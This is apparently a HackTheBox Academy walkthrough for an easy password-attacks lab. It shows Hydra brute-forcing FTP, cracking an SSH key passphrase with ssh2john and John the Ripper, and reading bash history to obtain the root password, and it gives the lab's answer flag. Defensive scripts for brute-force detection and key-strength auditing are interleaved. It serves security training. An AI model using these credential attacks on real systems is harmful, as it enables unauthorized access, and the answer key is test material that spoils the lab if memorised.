Password Attacks Lab - Easy
ℹ️ Information
- 🌐 Website: HackTheBox
- 📚 Module: Password Attacks
- 🔗 Link: Password Attacks Lab - Easy
❓ Question
Examine the first target and submit the root password as the answer.
📋 Walkthrough
First, we perform an Nmap scan to identify open ports and services on the target machine.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 10:15 UTC
Nmap scan report for 10.129.240.178
Host is up (0.026s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.76 seconds
Next, we use Hydra to perform a brute-force attack on the FTP service to find valid credentials.
└─$ hydra -L username.list ftp://$TARGET -P password.list
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-18 10:22:05
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21112 login tries (l:104/p:203), ~1320 tries per task
[DATA] attacking ftp://10.129.240.178:21/
[STATUS] 256.00 tries/min, 256 tries in 00:01h, 20856 to do in 01:22h, 16 active
[STATUS] 261.33 tries/min, 784 tries in 00:03h, 20328 to do in 01:18h, 16 active
[STATUS] 267.43 tries/min, 1872 tries in 00:07h, 19240 to do in 01:12h, 16 active
[STATUS] 264.27 tries/min, 3964 tries in 00:15h, 17148 to do in 01:05h, 16 active
[STATUS] 265.42 tries/min, 8228 tries in 00:31h, 12884 to do in 00:49h, 16 active
[STATUS] 266.64 tries/min, 12532 tries in 00:47h, 8580 to do in 00:33h, 16 active
[21][ftp] host: 10.129.240.178 login: mike password: 7777777
We successfully find the FTP credentials: mike:7777777.
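From the defender's side, a run like the Hydra session above stands out in the FTP server's log. The following is an added example, not part of the original walkthrough: it flags a source address that exceeds a failure threshold inside a sliding window and then reports any successful login from that address. The log lines are constructed in vsftpd's log style (an assumed format), and the function name, window and threshold are illustrative.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in vsftpd.log style (assumed format, not from the lab target).
SAMPLE_LOG = """\
Tue Mar 18 10:22:05 2025 [pid 901] [admin] FAIL LOGIN: Client "203.0.113.7"
Tue Mar 18 10:22:05 2025 [pid 902] [root] FAIL LOGIN: Client "203.0.113.7"
Tue Mar 18 10:22:06 2025 [pid 903] [mike] FAIL LOGIN: Client "203.0.113.7"
Tue Mar 18 10:22:06 2025 [pid 904] [john] FAIL LOGIN: Client "203.0.113.7"
Tue Mar 18 10:22:07 2025 [pid 905] [alice] FAIL LOGIN: Client "192.0.2.10"
Tue Mar 18 10:22:07 2025 [pid 906] [mike] FAIL LOGIN: Client "203.0.113.7"
Tue Mar 18 10:22:08 2025 [pid 907] [mike] FAIL LOGIN: Client "203.0.113.7"
Tue Mar 18 10:22:15 2025 [pid 908] [alice] OK LOGIN: Client "192.0.2.10"
Tue Mar 18 11:09:41 2025 [pid 909] [mike] OK LOGIN: Client "203.0.113.7"
"""

LINE_RE = re.compile(
    r'^\w{3} (\w{3} +\d+ [\d:]{8} \d{4}) \[pid \d+\] \[([^\]]*)\] '
    r'(OK|FAIL) LOGIN: Client "([^"]+)"')

def detect_bruteforce(lines, window=timedelta(seconds=60), max_fails=5):
    """Alert once per source exceeding max_fails failures within window,
    then on every successful login from a source already flagged."""
    recent = defaultdict(deque)  # client -> failure timestamps inside the window
    users = defaultdict(set)     # client -> distinct usernames attempted
    flagged, alerts = set(), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S %Y")
        user, result, client = m.group(2), m.group(3), m.group(4)
        if result == "FAIL":
            q = recent[client]
            q.append(ts)
            users[client].add(user)
            while ts - q[0] > window:  # drop failures older than the window
                q.popleft()
            if len(q) > max_fails and client not in flagged:
                flagged.add(client)
                alerts.append(("bruteforce", client, len(users[client])))
        elif client in flagged:
            alerts.append(("success_after_bruteforce", client, user))
    return alerts

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG.splitlines()))
```

Hydra reported roughly 265 tries per minute in the run above, far beyond any reasonable per-source threshold, so the second alert type (a success after a burst of failures) is the one that identifies the compromised account.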
Using the obtained credentials, we log in to the FTP server and download the id_rsa file.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp $TARGET
Connected to 10.129.240.178.
220 (vsFTPd 3.0.3)
Name (10.129.240.178:kali): mike
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||45144|)
150 Here comes the directory listing.
-rw-rw-r-- 1 1000 1000 554 Feb 09 2022 authorized_keys
-rw------- 1 1000 1000 2546 Feb 09 2022 id_rsa
-rw-r--r-- 1 1000 1000 570 Feb 09 2022 id_rsa.pub
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||53276|)
150 Opening BINARY mode data connection for id_rsa (2546 bytes).
100% |*************************************| 2546 384.99 KiB/s 00:00 ETA
226 Transfer complete.
2546 bytes received in 00:00 (78.17 KiB/s)
ftp> exit
221 Goodbye.
We then use ssh2john to convert the id_rsa file to a hash format and crack it using John the Ripper.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ssh2john id_rsa > hash
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
7777777 (id_rsa)
1g 0:00:00:00 DONE (2025-03-18 11:30) 50.00g/s 9600p/s 9600c/s 9600C/s 123456..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We find that the passphrase for the id_rsa file is 7777777, the same value as the FTP password.
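John's output above reports KDF/cipher 0 (MD5/AES) and an iteration count of 1, which means the key is stored in the legacy PEM container, where each passphrase guess is very cheap to test. As an added example, not part of the original walkthrough, this script classifies a private key file by container and key-derivation settings so that weakly protected keys can be found in an audit. The sample keys are constructed headers without key material, and the function name is illustrative.

```python
import base64
import struct

def _s(b):  # encode an SSH wire string: uint32 length prefix + data
    return struct.pack(">I", len(b)) + b

def _read(buf, off):  # decode one SSH wire string; return (data, next offset)
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def classify_private_key(text):
    """Return (container, protection) for a PEM-armoured SSH private key."""
    lines = [l.strip() for l in text.strip().splitlines()]
    head = lines[0]
    if head == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\0"
        if not blob.startswith(magic):
            return ("openssh-v1", "malformed")
        cipher, off = _read(blob, len(magic))
        kdf, off = _read(blob, off)
        opts, _ = _read(blob, off)
        if kdf == b"none":
            return ("openssh-v1", "unencrypted")
        _salt, o = _read(opts, 0)  # kdfoptions = string salt, uint32 rounds
        (rounds,) = struct.unpack_from(">I", opts, o)
        return ("openssh-v1", f"{kdf.decode()} rounds={rounds} cipher={cipher.decode()}")
    if head == "-----BEGIN ENCRYPTED PRIVATE KEY-----":
        return ("pkcs8", "encrypted, PBES parameters not parsed")
    if head.startswith("-----BEGIN ") and head.endswith("PRIVATE KEY-----"):
        dek = next((l for l in lines if l.startswith("DEK-Info:")), None)
        if dek is None:
            return ("legacy-pem", "unencrypted")
        # Legacy PEM uses OpenSSL's MD5-based key derivation with an iteration count of 1.
        cipher = dek.split(":", 1)[1].split(",")[0].strip()
        return ("legacy-pem", f"md5 iterations=1 cipher={cipher}")
    return ("unknown", "unknown")

# Constructed samples: headers only, placeholder body, no real key material.
LEGACY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

AAAA
-----END RSA PRIVATE KEY-----"""
_opts = _s(bytes(16)) + struct.pack(">I", 16)  # 16-byte salt, 16 bcrypt rounds
_hdr = b"openssh-key-v1\0" + _s(b"aes256-ctr") + _s(b"bcrypt") + _s(_opts)
MODERN = ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(_hdr).decode()
          + "\n-----END OPENSSH PRIVATE KEY-----")
```

A legacy key can be rewritten into the OpenSSH container with more KDF rounds using ssh-keygen -p -a <rounds> -f <keyfile>, but a passphrase that appears in a common wordlist stays guessable under any KDF.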
Next, we use the id_rsa file and the cracked passphrase to log in to the target machine via SSH.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ssh -i id_rsa mike@$TARGET
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-99-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Mar 18 10:38:56 GMT 2025
System load: 0.0 Processes: 158
Usage of /: 31.5% of 8.79GB Users logged in: 0
Memory usage: 11% IPv4 address for ens192: 10.129.240.178
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
214 updates can be applied immediately.
165 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Feb 9 17:37:10 2022 from 10.129.202.64
mike@skills-easy:~$
Once logged in, we check the .bash_history file to find any useful information.
mike@skills-easy:~$ ls -la
total 40
drwxr-xr-x 4 mike mike 4096 Feb 10 2022 .
drwxr-xr-x 3 root root 4096 Feb 9 2022 ..
-rw------- 1 mike mike 5900 Feb 10 2022 .bash_history
-rw-r--r-- 1 mike mike 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 mike mike 3771 Feb 25 2020 .bashrc
drwx------ 2 mike mike 4096 Feb 9 2022 .cache
-rw-r--r-- 1 mike mike 807 Feb 25 2020 .profile
drwx------ 2 mike mike 4096 Feb 9 2022 .ssh
-rw------- 1 mike mike 2859 Feb 9 2022 .viminfo
mike@skills-easy:~$ cat .bash_
.bash_history .bash_logout
mike@skills-easy:~$ cat .bash_history
In the .bash_history file, we find the root password.
We use the found password to switch to the root user.
Answer
dgb6fzm0ynk@AME9pqu